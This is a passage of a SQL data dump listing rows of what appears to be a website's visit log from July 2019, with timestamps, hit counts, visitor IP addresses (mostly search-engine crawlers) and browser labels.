'66.249.66.128','chrome'),(434148,1562669350,1,1,0,0,'130.180.208.65','chrome'),(434149,1562669965,1,1,0,0,'8.29.198.26','other'),(434150,1562670013,1,1,0,0,'66.249.66.220','chrome'),(434151,1562670428,1,1,0,0,'8.29.198.25','other'),(434152,1562670595,1,1,0,0,'207.46.13.102','other'),(434153,1562671221,1,1,0,0,'207.46.13.68','other'),(434154,1562671225,2,2,0,0,'207.46.13.127','other'),(434155,1562672041,1,1,0,0,'207.46.13.63','other'),(434156,1562672287,1,1,0,0,'46.211.3.133','chrome'),(434157,1562672304,1,1,0,0,'66.249.66.222','chrome'),(434158,1562672509,1,1,0,0,'40.77.167.89','other'),(434159,1562673381,1,1,0,0,'5.45.207.79','other'),(434160,1562673400,1,1,0,0,'157.55.39.164','other'),(434161,1562673499,1,1,0,0,'37.55.130.100','chrome'),(434162,1562674007,1,1,0,0,'40.77.167.89','other'),(434163,1562674082,1,1,0,0,'46.175.140.82','chrome'),(434164,1562674215,1,1,0,0,'207.46.13.127','other'),(434165,1562675257,1,1,0,0,'141.8.142.38','other'),(434166,1562675371,1,1,0,0,'141.8.142.65','other'),(434167,1562675434,2,2,0,0,'40.77.167.89','other'),(434168,1562675476,1,1,0,0,'141.8.132.16','other'),(434169,1562675545,1,1,0,0,'5.45.207.19','other'),(434170,1562675673,3,3,0,0,'66.249.66.222','chrome'),(434171,1562675773,1,1,0,0,'66.249.66.218','chrome'),(434172,1562675988,1,1,0,0,'207.46.13.192','other'),(434173,1562675997,1,1,0,0,'40.77.167.48','other'),(434174,1562677103,1,1,0,0,'66.249.66.218','chrome'),(434175,1562677211,1,1,0,0,'66.249.66.128','chrome'),(434176,1562677256,2,2,0,0,'40.77.167.48','other'),(434177,1562677584,1,1,0,0,'40.77.167.89','other'),(434178,1562677664,1,1,0,0,'207.46.13.192','other'),(434179,1562678483,1,1,0,0,'91.196.178.77','chrome'),(434180,1562679660,1,1,0,0,'212.1.108.150','msie'),(434181,1562679668,1,1,0,0,'212.1.108.150','chrome'),(434182,1562680506,1,1,0,0,'13.66.139.0','other'),(434183,1562680783,1,1,0,0,'40.77.167.89','other'),(434184,1562680849,1,1,0,0,'8.29.198.26','other'),(434185,1562680946,1,1,0,0,'66.249.66.222','chrome'),(434186,1562681067,1,1,0,0,'172.94.102.89','chrome'),(434187,1562681199,1,1,0,0,'212.1.108.150','msie'),(434188,1562681202,2,2,0,0,'212.1.108.150','chrome'),(434189,1562681301,1,1,0,0,'8.29.198.27','other'),(434190,1562681931,1,1,0,0,'157.55.39.173','other'),(434191,1562681985,1,1,0,0,'46.211.46.180','chrome'),(434192,1562681987,2,2,0,0,'207.46.13.192','other'),(434193,1562682492,1,1,0,0,'213.180.203.48','other'),(434194,1562682916,1,1,0,0,'207.46.13.243','other'),(434195,1562683161,1,1,0,0,'178.140.23.6','msie'),(434196,1562683314,1,1,0,0,'157.55.39.241','other'),(434197,1562684005,1,1,0,0,'207.46.13.192','other'),(434198,1562684080,1,1,0,0,'40.77.167.89','other'),(434199,1562685253,1,1,0,0,'40.77.167.177','other'),(434200,1562685317,1,1,0,0,'77.111.244.85','chrome'),(434201,1562685750,1,1,0,0,'157.55.39.241','other'),(434202,1562686244,1,1,0,0,'66.249.66.222','chrome'),(434203,1562686411,1,1,0,0,'178.154.244.11','other'),(434204,1562687348,3,3,0,0,'40.77.167.93','other'),(434205,1562687542,1,1,0,0,'40.77.167.103','other'),(434206,1562687547,2,2,0,0,'40.77.167.87','other'),(434207,1562687760,1,1,0,0,'66.249.66.130','chrome'),(434208,1562688769,1,1,0,0,'40.77.167.93','other'),(434209,1562688786,1,1,0,0,'193.106.30.98','chrome'),(434210,1562689664,2,2,0,0,'40.77.167.87','other'),(434211,1562689833,1,1,0,0,'157.55.39.216','other'),(434212,1562690323,1,1,0,0,'157.55.39.169','other'),(434213,1562690550,1,1,0,0,'207.46.13.163','other'),(434214,1562691722,1,1,0,0,'8.29.198.27','other'),(434215,1562692005,1,1,0,0,'157.55.39.199','other'),(434216,1562692172,1,1,0,0,'8.29.198.25','other'),(434217,1562692185,1,1,0,0,'66.249.66.218','chrome'),(434218,1562692378,1,1,0,0,'66.249.66.220','chrome'),(434219,1562692455,1,1,0,0,'5.45.207.8','other'),(434220,1562693174,1,1,0,0,'5.45.207.19','other'),(434221,1562693319,1,1,0,0,'157.55.39.199','other'),(434222,1562693452,1,1,0,0,'40.85.160.241','chrome'),(434223,1562693634,1,1,0,0,'178.154.244.11','other'),(434224,1562694024,1,1,0,0,'40.77.167.87','other'),(434225,1562694772,1,1,0,0,'157.55.39.198','other'),(434226,1562695587,1,1,0,0,'66.249.66.220','chrome'),(434227,1562696023,1,1,0,0,'66.249.66.130','chrome'),(434228,1562697482,1,1,0,0,'91.196.178.85','firefox'),(434229,1562697768,1,1,0,0,'157.55.39.107','other'),(434230,1562697923,1,1,0,0,'5.45.207.79','other'),(434231,1562697994,1,1,0,0,'157.55.39.198','other'),(434232,1562699067,1,1,0,0,'40.77.167.146','other'),(434233,1562699264,1,1,0,0,'157.55.39.192','other'),(434234,1562699396,2,2,0,0,'66.249.66.222','chrome'),(434235,1562699402,1,1,0,0,'66.249.66.220','chrome'),(434236,1562700119,1,1,0,0,'5.45.207.79','other'),(434237,1562700794,1,1,0,0,'157.55.39.192','other'),(434238,1562701311,1,1,0,0,'207.46.13.221','other'),(434239,1562701875,1,1,0,0,'157.55.39.192','other'),(434240,1562701998,1,1,0,0,'141.8.142.38','other'),(434241,1562702115,1,1,0,0,'66.249.66.132','chrome'),(434242,1562702564,1,1,0,0,'66.249.66.218','chrome'),(434243,1562702584,1,1,0,0,'8.29.198.25','other'),(434244,1562702588,2,2,0,0,'40.77.167.146','other'),(434245,1562703041,1,1,0,0,'8.29.198.26','other'),(434246,1562703203,1,1,0,0,'87.250.224.65','other'),(434247,1562703249,1,1,0,0,'207.46.13.221','other'),(434248,1562703254,2,2,0,0,'157.55.39.192','other'),(434249,1562703546,2,2,0,0,'40.77.167.146','other'),(434250,1562704062,1,1,0,0,'207.46.13.182','other'),(434251,1562704616,2,2,0,0,'157.55.39.192','other'),(434252,1562704912,1,1,0,0,'207.46.13.221','other'),(434253,1562704937,2,2,0,0,'66.249.66.220','chrome'),(434254,1562704971,1,1,0,0,'66.249.66.218','chrome'),(434255,1562705124,1,1,0,0,'5.45.207.19','other'),(434256,1562705132,1,1,0,0,'157.55.39.239','other'),(434257,1562705188,1,1,0,0,'40.77.167.146','other'),(434258,1562705922,3,3,0,0,'157.55.39.192','other'),(434259,1562705996,1,1,0,0,'178.154.244.11','other'),(434260,1562706049,1,1,0,0,'213.111.87.127','chrome'),(434261,1562706226,1,1,0,0,'157.55.39.239','other'),(434262,1562706503,1,1,0,0,'66.249.66.222','chrome'),(434263,1562706563,1,1,0,0,'66.249.66.220','chrome'),(434264,1562707142,1,1,0,0,'178.154.244.11','other'),(434265,1562707908,2,2,0,0,'66.249.75.78','chrome'),(434266,1562707966,1,1,0,0,'66.249.75.76','chrome'),(434267,1562707980,1,1,0,0,'66.249.75.52','chrome'),(434268,1562708022,1,1,0,0,'40.77.167.146','other'),(434269,1562708357,1,1,0,0,'157.55.39.239','other'),(434270,1562708673,1,1,0,0,'157.55.39.134','other'),(434271,1562708764,1,1,0,0,'104.130.231.138','firefox'),(434272,1562709115,1,1,0,0,'40.77.167.66','other'),(434273,1562709345,2,2,0,0,'157.55.39.239','other'),(434274,1562709775,1,1,0,0,'157.55.39.192','other'),(434275,1562710353,1,1,0,0,'40.77.167.48','other'),(434276,1562710864,1,1,0,0,'157.55.39.192','other'),(434277,1562710880,1,1,0,0,'40.77.167.70','other'),(434278,1562710885,1,1,0,0,'157.55.39.239','other'),(434279,1562711478,1,1,0,0,'178.154.244.11','other'),(434280,1562712194,6,6,0,0,'66.249.75.74','chrome'),(434281,1562712401,2,2,0,0,'66.249.75.54','chrome'),(434282,1562712505,1,1,0,0,'37.9.113.148','other'),(434283,1562712580,2,2,0,0,'66.249.75.56','chrome'),(434284,1562712722,1,1,0,0,'178.154.244.11','other'),(434285,1562712724,1,1,0,0,'66.249.75.76','chrome'),(434286,1562713463,1,1,0,0,'8.29.198.26','other'),(434287,1562713916,1,1,0,0,'8.29.198.27','other'),(434288,1562713941,1,1,0,0,'66.249.75.74','chrome'),(434289,1562713943,2,2,0,0,'66.249.75.76','chrome'),(434290,1562713995,1,1,0,0,'178.154.244.11','other'),(434291,1562714222,1,1,0,0,'207.46.13.93','other'),(434292,1562714732,1,1,0,0,'93.119.227.19','other'),(434294,1562714910,1,1,0,0,'51.68.152.26','chrome'),(434295,1562717724,1,1,0,0,'207.46.13.209','other'),(434296,1562718004,1,1,0,0,'157.55.39.57','other'),(434297,1562718010,1,1,0,0,'66.249.75.78','chrome'),(434298,1562718637,1,1,0,0,'66.249.75.76','chrome'),(434299,1562719968,1,1,0,0,'40.77.167.130','other'),(434300,1562721397,17,17,0,0,'5.9.154.68','other'),(434301,1562721410,1,1,0,0,'66.249.75.76','chrome'),(434302,1562721855,1,1,0,0,'40.77.167.85','other'),(434303,1562721865,1,1,0,0,'37.147.226.186','msie'),(434304,1562721895,1,1,0,0,'34.220.45.39','other'),(434305,1562722099,1,1,0,0,'207.46.13.213','other'),(434306,1562722108,1,1,0,0,'66.249.75.78','chrome'),(434307,1562722260,1,1,0,0,'40.77.167.122','other'),(434308,1562723432,1,1,0,0,'207.46.13.233','other'),(434309,1562723788,2,2,0,0,'207.46.13.200','other'),(434310,1562724333,2,2,0,0,'8.29.198.27','other'),(434311,1562724956,1,1,0,0,'207.46.13.200','other'),(434312,1562726029,1,1,0,0,'13.66.139.0','other'),(434313,1562726486,1,1,0,0,'40.77.167.44','other'),(434314,1562727473,1,1,0,0,'40.77.167.141','other'),(434315,1562727490,1,1,0,0,'13.66.139.0','other'),(434316,1562728559,1,1,0,0,'213.180.203.40','other'),(434317,1562729105,1,1,0,0,'207.46.13.233','other'),(434318,1562729541,1,1,0,0,'40.77.167.122','other'),(434319,1562729821,2,2,0,0,'40.77.167.141','other'),(434320,1562729833,1,1,0,0,'66.249.75.78','chrome'),(434321,1562730312,1,1,0,0,'66.249.75.76','chrome'),(434322,1562730610,1,1,0,0,'157.55.39.135','other'),(434323,1562731046,2,2,0,0,'207.46.13.233','other'),(434324,1562732792,1,1,0,0,'40.77.167.122','other'),(434325,1562733356,1,1,0,0,'13.66.139.0','other'),(434326,1562734945,12,12,0,0,'176.31.104.153','other'),(434327,1562735153,1,1,0,0,'207.46.13.242','other'),(434328,1562735191,2,2,0,0,'8.29.198.25','other'),(434329,1562735997,1,1,0,0,'192.162.35.166','chrome'),(434330,1562736063,1,1,0,0,'40.77.167.23','other'),(434331,1562736437,1,1,0,0,'91.196.178.129','firefox'),(434332,1562736497,1,1,0,0,'178.154.244.11','other'),(434333,1562736789,1,1,0,0,'130.185.250.76','other'),(434334,1562736950,2,2,0,0,'207.46.13.148','other'),(434335,1562737151,1,1,0,0,'192.162.35.166','chrome'),(434336,1562738280,1,1,0,0,'207.46.13.148','other'),(434337,1562738387,1,1,0,0,'92.112.217.236','chrome'),(434338,1562738715,1,1,0,0,'95.132.32.166','chrome'),(434339,1562739171,1,1,0,0,'207.46.13.205','other'),(434340,1562739682,1,1,0,0,'51.15.191.81','firefox'),(434341,1562741089,4,4,0,0,'66.249.75.78','chrome'),(434342,1562741294,1,1,0,0,'207.46.13.105','other'),(434343,1562741400,1,1,0,0,'66.249.75.74','chrome'),(434344,1562741478,1,1,0,0,'192.162.237.35','chrome'),(434345,1562741736,1,1,0,0,'40.77.167.95','other'),(434346,1562742234,2,2,0,0,'130.180.219.234','chrome'),(434347,1562742935,3,3,0,0,'40.77.167.45','other'),(434348,1562743118,2,2,0,0,'207.46.13.37','other'),(434349,1562743122,5,5,0,0,'157.55.39.75','other'),(434350,1562743668,3,3,0,0,'157.55.39.235','other'),(434351,1562743733,1,1,0,0,'212.224.95.115','firefox'),(434352,1562745180,2,2,0,0,'66.249.75.74','chrome'),(434353,1562745450,5,5,0,0,'207.46.13.37','other'),(434354,1562745459,1,1,0,0,'40.77.167.44','other'),(434355,1562745463,3,3,0,0,'157.55.39.99','other'),(434356,1562745465,7,7,0,0,'207.46.13.233','other'),(434357,1562745588,1,1,0,0,'66.249.75.78','chrome'),(434358,1562745596,1,1,0,0,'66.249.75.76','chrome'),(434359,1562746063,1,1,0,0,'8.29.198.25','other'),(434360,1562746390,1,1,0,0,'91.196.178.77','chrome'),(434361,1562746453,1,1,0,0,'207.46.13.37','other'),(434362,1562746523,1,1,0,0,'8.29.198.26','other'),(434363,1562746993,1,1,0,0,'31.43.19.170','chrome'),(434364,1562747150,1,1,0,0,'178.154.171.17','other'),(434365,1562747368,1,1,0,0,'91.196.178.77','chrome'),(434366,1562748026,1,1,0,0,'66.249.75.76','chrome'),(434367,1562749609,1,1,0,0,'91.196.178.77','chrome'),(434368,1562749908,1,1,0,0,'207.46.13.233','other'),(434369,1562750195,2,2,0,0,'13.66.139.0','other'),(434370,1562751083,1,1,0,0,'66.249.75.76','chrome'),(434371,1562751271,1,1,0,0,'193.106.30.99','firefox'),(434372,1562751905,4,4,0,0,'91.196.179.138','chrome'),(434373,1562752331,2,2,0,0,'144.76.38.40','other'),(434374,1562752951,1,1,0,0,'40.77.167.169','other'),(434375,1562753165,1,1,0,0,'91.196.178.88','chrome'),(434376,1562754193,1,1,0,0,'109.74.154.72','chrome'),(434377,1562755067,1,1,0,0,'94.242.62.112','chrome'),(434378,1562755147,2,2,0,0,'95.213.141.126','opera'),(434379,1562755432,1,1,0,0,'207.46.13.99','other'),(434380,1562756575,1,1,0,0,'207.46.13.233','other'),(434381,1562756591,1,1,0,0,'207.46.13.65','other'),(434382,1562756951,1,1,0,0,'8.29.198.27','other'),(434383,1562757035,1,1,0,0,'95.67.75.146','chrome'),(434384,1562757431,1,1,0,0,'8.29.198.26','other'),(434385,1562757510,1,1,0,0,'95.132.48.145','chrome'),(434386,1562757785,1,1,0,0,'87.250.224.81','other'),(434387,1562758128,1,1,0,0,'13.66.139.0','other'),(434388,1562758579,1,1,0,0,'157.55.39.68','other'),(434389,1562758967,1,1,0,0,'91.124.182.170','firefox'),(434390,1562758990,1,1,0,0,'91.196.179.138','chrome'),(434391,1562759441,2,2,0,0,'157.55.39.29','other'),(434392,1562760027,1,1,0,0,'95.132.59.177','chrome'),(434393,1562760202,3,3,0,0,'91.196.179.138','chrome'),(434394,1562760362,1,1,0,0,'193.105.62.235','chrome'),(434395,1562761081,4,4,0,0,'157.55.39.66','other'),(434396,1562761119,1,1,0,0,'157.55.39.172','other'),(434397,1562761164,1,1,0,0,'60.191.38.77','firefox'),(434398,1562761258,1,1,0,0,'157.55.39.29','other'),(434399,1562762699,1,1,0,0,'141.8.142.81','other'),(434400,1562763116,1,1,0,0,'180.76.15.5','other'),(434401,1562763632,1,1,0,0,'60.191.38.77','firefox'),(434402,1562763754,1,1,0,0,'37.9.113.20','other'),(434403,1562764059,1,1,0,0,'207.46.13.40','other'),(434404,1562764063,1,1,0,0,'91.196.178.67','chrome'),(434405,1562764109,1,1,0,0,'157.55.39.29','other'),(434406,1562764354,1,1,0,0,'157.55.39.66','other'),(434407,1562764506,1,1,0,0,'87.250.224.81','other'),(434408,1562765286,3,3,0,0,'35.188.10.32','chrome'),(434409,1562765320,3,3,0,0,'130.211.220.103','chrome'),(434410,1562765342,3,3,0,0,'34.68.176.107','chrome'),(434411,1562765371,3,3,0,0,'35.239.186.45','chrome'),(434412,1562765442,2,2,0,0,'35.188.149.160','chrome'),(434413,1562765568,1,1,0,0,'91.196.178.97','chrome'),(434414,1562765592,3,3,0,0,'34.66.181.189','chrome'),(434415,1562766022,1,1,0,0,'91.196.178.186','chrome'),(434416,1562766274,1,1,0,0,'157.55.39.66','other'),(434417,1562766490,1,1,0,0,'91.196.177.46','firefox'),(434418,1562766677,1,1,0,0,'207.46.13.40','other'),(434419,1562767252,1,1,0,0,'195.69.177.223','chrome'),(434420,1562767864,1,1,0,0,'8.29.198.25','other'),(434421,1562768101,1,1,0,0,'66.249.75.74','chrome'),(434422,1562768190,2,2,0,0,'37.190.160.106','chrome'),(434423,1562768338,1,1,0,0,'8.29.198.27','other'),(434424,1562768421,1,1,0,0,'66.249.75.76','chrome'),(434425,1562768502,1,1,0,0,'157.55.39.66','other'),(434426,1562770505,1,1,0,0,'141.8.142.108','other'),(434427,1562770576,1,1,0,0,'207.46.13.14','other'),(434428,1562772169,1,1,0,0,'195.154.61.206','firefox'),(434429,1562773625,1,1,0,0,'157.55.39.29','other'),(434430,1562774352,1,1,0,0,'207.46.13.40','other'),(434431,1562774769,1,1,0,0,'46.219.230.88','chrome'),(434432,1562774830,1,1,0,0,'207.46.13.14','other'),(434433,1562774870,1,1,0,0,'157.55.39.29','other'),(434434,1562775504,1,1,0,0,'87.250.224.65','other'),(434435,1562776213,1,1,0,0,'193.106.30.99','chrome'),(434436,1562776675,1,1,0,0,'91.196.178.58','chrome'),(434437,1562777056,1,1,0,0,'207.46.13.46','other'),(434438,1562777108,1,1,0,0,'207.46.13.14','other'),(434439,1562777341,1,1,0,0,'213.180.203.61','other'),(434440,1562777856,1,1,0,0,'193.106.30.99','chrome'),(434441,1562778457,1,1,0,0,'188.32.136.113','msie'),(434442,1562778461,1,1,0,0,'95.24.3.253','msie'),(434443,1562778711,1,1,0,0,'207.46.13.40','other'),(434444,1562778742,1,1,0,0,'207.46.13.77','other'),(434445,1562778769,2,2,0,0,'8.29.198.27','other'),(434446,1562778799,1,1,0,0,'87.250.224.47','other'),(434447,1562780491,1,1,0,0,'91.196.178.59','chrome'),(434448,1562780553,1,1,0,0,'91.196.178.164','chrome'),(434449,1562780748,1,1,0,0,'207.46.13.40','other'),(434450,1562781852,1,1,0,0,'207.46.13.40','other'),(434451,1562782252,3,3,0,0,'66.249.75.74','chrome'),(434452,1562782880,1,1,0,0,'91.196.178.168','chrome'),(434453,1562783325,1,1,0,0,'207.46.13.14','other'),(434454,1562784241,2,2,0,0,'91.196.121.13','chrome'),(434455,1562784328,1,1,0,0,'157.55.39.72','other'),(434456,1562784842,4,4,0,0,'207.46.13.14','other'),(434457,1562786166,1,1,0,0,'141.8.132.16','other'),(434458,1562786560,1,1,0,0,'207.46.13.14','other'),(434459,1562787552,1,1,0,0,'91.209.11.236','other'),(434460,1562787582,1,1,0,0,'207.46.13.78','other'),(434461,1562788088,1,1,0,0,'207.46.13.40','other'),(434462,1562788102,1,0,1,0,'66.249.73.70',''),(434463,1562788635,1,1,0,0,'141.8.142.65','other'),(434464,1562788639,1,1,0,0,'95.108.181.75','other'),(434465,1562789422,1,1,0,0,'66.249.73.68','chrome'),(434466,1562789645,1,1,0,0,'8.29.198.26','other'),(434467,1562790090,1,1,0,0,'141.8.132.16','other'),(434468,1562790133,1,1,0,0,'8.29.198.27','other'),(434469,1562790186,1,1,0,0,'207.46.13.111','other'),(434470,1562790196,1,1,0,0,'95.108.181.83','other'),(434471,1562791093,2,2,0,0,'157.55.39.8','other'),(434472,1562791097,1,1,0,0,'207.46.13.111','other'),(434473,1562791225,1,1,0,0,'66.249.73.72','chrome'),(434474,1562793482,1,1,0,0,'66.249.73.72','chrome'),(434475,1562794436,1,1,0,0,'157.55.39.8','other'),(434476,1562797627,2,2,0,0,'40.77.167.46','other'),(434477,1562798171,1,1,0,0,'40.77.167.210','other'),(434478,1562799723,1,1,0,0,'66.249.73.70','chrome'),(434479,1562800373,1,1,0,0,'207.46.13.241','other'),(434480,1562800526,1,1,0,0,'8.29.198.27','other'),(434481,1562801011,1,1,0,0,'8.29.198.26','other'),(434482,1562801025,1,1,0,0,'40.77.167.40','other'),(434483,1562802196,1,1,0,0,'5.45.207.19','other'),(434484,1562802633,2,2,0,0,'5.45.207.79','other'),(434485,1562803305,1,1,0,0,'94.242.62.112','chrome'),(434486,1562803509,1,1,0,0,'87.250.224.65','other'),(434487,1562804384,1,1,0,0,'66.249.73.68','chrome'),(434488,1562804575,1,1,0,0,'185.38.148.144','firefox'),(434489,1562806781,1,1,0,0,'66.249.73.70','chrome'),(434490,1562806823,1,1,0,0,'207.46.13.132','other'),(434491,1562807156,2,2,0,0,'157.55.39.148','other'),(434492,1562807634,1,1,0,0,'66.249.73.68','chrome'),(434493,1562809715,1,1,0,0,'157.55.39.185','other'),(434494,1562811171,1,1,0,0,'66.249.73.70','chrome'),(434495,1562811389,2,2,0,0,'8.29.198.27','other'),(434496,1562811475,1,1,0,0,'157.55.39.148','other'),(434497,1562812312,1,1,0,0,'5.45.207.19','other'),(434498,1562812870,1,1,0,0,'157.55.39.148','other'),(434499,1562813274,1,1,0,0,'87.250.224.65','other'),(434500,1562813757,2,2,0,0,'66.249.73.72','chrome'),(434501,1562814072,1,1,0,0,'157.55.39.185','other'),(434502,1562814173,1,1,0,0,'13.66.139.0','other'),(434503,1562814383,1,1,0,0,'66.249.65.114','chrome'),(434504,1562814797,1,1,0,0,'38.145.99.37','chrome'),(434505,1562815212,1,1,0,0,'47.108.70.92','other'),(434506,1562816231,1,1,0,0,'5.45.207.19','other'),(434507,1562816304,1,1,0,0,'141.8.142.191','other'),(434508,1562816484,1,1,0,0,'207.46.13.109','other'),(434509,1562817321,1,1,0,0,'141.8.142.108','other'),(434510,1562818264,1,1,0,0,'66.249.65.114','chrome'),(434511,1562818710,1,1,0,0,'157.55.39.148','other'),(434512,1562819082,1,1,0,0,'46.211.3.220','chrome'),(434513,1562819841,1,1,0,0,'40.77.167.158','other'),(434514,1562819873,1,1,0,0,'141.8.142.81','other'),(434515,1562820093,1,1,0,0,'207.46.13.109','other'),(434516,1562820516,2,2,0,0,'178.154.244.11','other'),(434517,1562821154,1,1,0,0,'207.46.13.109','other'),(434518,1562821619,1,1,0,0,'66.249.73.68','chrome'),(434519,1562823236,1,1,0,0,'207.46.13.109','other'),(434520,1562823423,1,1,0,0,'185.234.219.17','chrome'),(434521,1562823519,1,1,0,0,'91.203.144.194','other'),(434522,1562824236,1,1,0,0,'91.196.178.89','chrome'),(434523,1562824341,1,1,0,0,'157.55.39.185','other'),(434524,1562824427,1,1,0,0,'40.77.167.144','other'),(434525,1562824674,1,1,0,0,'91.196.178.34','chrome'),(434526,1562825441,1,1,0,0,'40.77.167.158','other'),(434527,1562825893,1,1,0,0,'91.196.178.183','chrome'),(434528,1562826524,1,1,0,0,'40.77.167.144','other'),(434529,1562826898,1,1,0,0,'8.29.198.27','other'),(434530,1562826975,1,1,0,0,'8.29.198.25','other'),(434531,1562827979,1,1,0,0,'91.196.178.89','chrome'),(434532,1562828308,1,1,0,0,'40.77.167.108','other'),(434533,1562830152,1,1,0,0,'195.28.31.237','chrome'),(434534,1562830255,2,2,0,0,'40.77.167.154','other'),(434535,1562830259,2,2,0,0,'40.77.167.55','other'),(434536,1562830264,2,2,0,0,'40.77.167.144','other'),(434537,1562830270,1,1,0,0,'157.55.39.168','other'),(434538,1562830743,1,1,0,0,'176.98.69.223','chrome'),(434539,1562832200,1,1,0,0,'157.55.39.168','other'),(434540,1562832698,1,1,0,0,'83.170.203.202','other'),(434541,1562832962,1,1,0,0,'66.249.73.70','chrome'),(434542,1562833376,1,1,0,0,'40.77.167.144','other'),(434543,1562837827,1,1,0,0,'178.154.244.11','other'),(434544,1562837989,1,1,0,0,'40.77.167.154','other'),(434545,1562838723,1,1,0,0,'8.29.198.26','other'),(434546,1562838854,1,1,0,0,'8.29.198.25','other'),(434547,1562838912,1,1,0,0,'40.77.167.11','other'),(434548,1562839184,1,1,0,0,'40.77.167.154','other'),(434549,1562840185,1,1,0,0,'109.74.154.72','chrome'),(434550,1562841041,1,1,0,0,'5.45.207.19','other'),(434551,1562843577,1,1,0,0,'40.77.167.11','other'),(434552,1562843653,1,1,0,0,'40.77.167.22','other'),(434553,1562844487,1,1,0,0,'5.45.207.19','other'),(434554,1562845041,1,1,0,0,'40.77.167.11','other'),(434555,1562845815,1,1,0,0,'40.77.167.22','other'),(434556,1562845994,1,1,0,0,'78.154.184.177','chrome'),(434557,1562847122,1,1,0,0,'91.196.177.46','firefox'),(434558,1562847334,2,2,0,0,'40.77.167.22','other'),(434559,1562847403,1,1,0,0,'91.196.178.89','chrome'),(434560,1562847620,1,1,0,0,'157.55.39.136','other'),(434561,1562847745,1,1,0,0,'40.77.167.11','other'),(434562,1562848318,1,1,0,0,'66.249.73.72','chrome'),(434563,1562848846,1,1,0,0,'5.45.207.79','other'),(434564,1562849212,1,1,0,0,'91.196.178.97','chrome'),(434565,1562849617,1,1,0,0,'8.29.198.26','other'),(434566,1562849894,1,1,0,0,'8.29.198.27','other'),(434567,1562850143,1,1,0,0,'178.154.244.11','other'),(434568,1562850520,1,1,0,0,'37.144.226.13','chrome'),(434569,1562850611,1,1,0,0,'66.249.73.72','chrome'),(434570,1562850686,1,1,0,0,'91.196.178.169','chrome'),(434571,1562852685,1,1,0,0,'91.196.178.89','chrome'),(434572,1562853293,1,1,0,0,'141.8.142.103','other'),(434573,1562853300,1,1,0,0,'5.45.207.19','other'),(434574,1562853827,1,1,0,0,'91.196.178.130','firefox'),(434575,1562854296,2,2,0,0,'40.77.167.27','other'),(434576,1562855004,1,1,0,0,'40.77.167.22','other'),(434577,1562857015,1,1,0,0,'40.77.167.169','other'),(434578,1562857556,1,1,0,0,'5.45.207.19','other'),(434579,1562857661,1,1,0,0,'178.154.244.11','other'),(434580,1562858714,1,1,0,0,'60.191.38.77','firefox'),(434581,1562858724,1,1,0,0,'207.46.13.123','other'),(434582,1562860507,2,2,0,0,'8.29.198.25','other'),(434583,1562861189,1,1,0,0,'40.77.167.169','other'),(434584,1562861346,2,2,0,0,'40.77.167.27','other'),(434585,1562861351,1,1,0,0,'40.77.167.22','other'),(434586,1562862084,1,1,0,0,'207.46.13.123','other'),(434587,1562862532,1,1,0,0,'37.53.229.186','chrome'),(434588,1562862584,1,1,0,0,'40.77.167.22','other'),(434589,1562863076,1,1,0,0,'66.249.73.68','chrome'),(434590,1562863332,1,1,0,0,'207.46.13.123','other'),(434591,1562864928,1,1,0,0,'5.45.207.79','other'),(434592,1562865450,1,1,0,0,'207.46.13.123','other'),(434593,1562866251,1,1,0,0,'178.154.244.11','other'),(434594,1562867469,1,1,0,0,'54.36.149.84','other'),(434595,1562867864,1,1,0,0,'54.36.149.81','other'),(434596,1562868071,1,1,0,0,'54.36.149.105','other'),(434597,1562868242,1,1,0,0,'54.36.149.52','other'),(434598,1562869160,2,2,0,0,'40.77.167.169','other'),(434599,1562870110,1,1,0,0,'66.249.75.56','chrome'),(434600,1562870112,2,2,0,0,'66.249.75.52','chrome'),(434601,1562870228,2,2,0,0,'40.77.167.22','other'),(434602,1562870399,1,1,0,0,'66.249.75.74','chrome'),(434603,1562870402,1,1,0,0,'66.249.75.76','chrome'),(434604,1562871218,1,1,0,0,'66.249.75.78','chrome'),(434605,1562871324,1,1,0,0,'54.36.149.57','other'),(434606,1562871393,1,1,0,0,'8.29.198.25','other'),(434607,1562871838,1,1,0,0,'8.29.198.27','other'),(434608,1562872754,1,1,0,0,'54.36.149.79','other'),(434609,1562873224,1,1,0,0,'178.154.244.11','other'),(434610,1562874052,1,1,0,0,'91.196.178.80','chrome'),(434611,1562874618,1,1,0,0,'66.249.93.219','chrome'),(434612,1562874950,1,1,0,0,'54.36.149.66','other'),(434613,1562874969,1,1,0,0,'178.154.244.11','other'),(434614,1562876222,1,1,0,0,'54.36.149.87','other'),(434615,1562877483,1,1,0,0,'207.46.13.36','other'),(434616,1562877524,1,1,0,0,'54.36.149.102','other'),(434617,1562878783,1,1,0,0,'207.46.13.167','other'),(434618,1562879181,1,1,0,0,'207.46.13.185','other'),(434619,1562879590,2,2,0,0,'54.36.149.73','other'),(434620,1562879907,1,1,0,0,'54.36.149.33','other'),(434621,1562880387,1,1,0,0,'87.250.224.81','other'),(434622,1562880926,1,1,0,0,'77.74.177.113','chrome'),(434623,1562881053,1,1,0,0,'207.46.13.167','other'),(434624,1562881266,1,1,0,0,'40.77.167.169','other'),(434625,1562881347,94,94,0,0,'5.9.139.194','other'),(434626,1562881708,1,1,0,0,'54.36.149.80','other'),(434627,1562881918,1,1,0,0,'54.36.149.46','other'),(434628,1562882277,2,2,0,0,'8.29.198.27','other'),(434629,1562882340,1,1,0,0,'54.36.149.74','other'),(434630,1562882963,1,1,0,0,'178.154.244.11','other'),(434631,1562883844,1,1,0,0,'40.77.167.169','other'),(434632,1562884295,1,1,0,0,'54.36.149.86','other'),(434633,1562884884,1,1,0,0,'207.46.13.36','other'),(434634,1562884893,1,1,0,0,'40.77.167.169','other'),(434635,1562886725,1,1,0,0,'207.46.13.185','other'),(434636,1562886936,1,1,0,0,'5.45.207.79','other'),(434637,1562887188,2,2,0,0,'40.77.167.169','other'),(434638,1562888502,1,1,0,0,'207.46.13.185','other'),(434639,1562888545,1,1,0,0,'141.8.142.103','other'),(434640,1562888641,1,1,0,0,'5.45.207.79','other'),(434641,1562889434,1,1,0,0,'66.249.69.62','chrome'),(434642,1562889642,1,1,0,0,'207.46.13.167','other'),(434643,1562890033,1,1,0,0,'66.249.69.60','chrome'),(434644,1562890064,1,1,0,0,'54.36.149.24','other'),(434645,1562890466,1,1,0,0,'66.249.69.62','chrome'),(434646,1562891350,1,1,0,0,'66.249.69.60','chrome'),(434647,1562891529,1,1,0,0,'207.46.13.36','other'),(434648,1562892059,1,1,0,0,'207.46.13.185','other'),(434649,1562893019,1,1,0,0,'178.154.244.11','other'),(434650,1562893147,1,1,0,0,'8.29.198.27','other'),(434651,1562893231,1,1,0,0,'54.36.149.86','other'),(434652,1562893663,1,1,0,0,'54.36.149.6','other'),(434653,1562893724,1,1,0,0,'8.29.198.26','other'),(434654,1562893784,2,2,0,